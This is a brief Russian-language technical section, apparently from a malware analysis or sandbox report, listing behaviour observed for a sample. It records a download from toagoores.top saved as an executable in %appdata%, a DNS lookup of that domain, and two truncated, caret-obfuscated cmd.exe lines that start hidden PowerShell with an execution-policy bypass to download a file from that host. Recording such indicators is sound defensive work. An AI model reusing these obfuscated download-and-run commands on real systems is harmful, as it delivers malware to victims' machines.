Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^w^eR^sHell^.^EXe^ -ExEcUTIOnPOl^iCY bypaSs -NOP^rO^fILe^ -wIn^DoWs^tY^Le^ hi^D^de^N (N^ew-oBJEcT^ sYS^T^EM.nEt^.WEBcl^iE^N^t^).DOWNL^O^ADf^i^le^(^'http://toagoores.top/read....
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^O^w^eR^sHell^.^EXe^ -ExEcUTIOnPOl^iCY bypaSs -NOP^rO^fILe^ -wIn^DoWs^tY^Le^ hi^D^de^N (N^ew-oBJEcT^ sYS^T^EM.nEt^.WEBcl^iE^N^t^).DOWNL^O^ADf^i^le^(^'http://toagoores.top/read....' (со скрытым окном)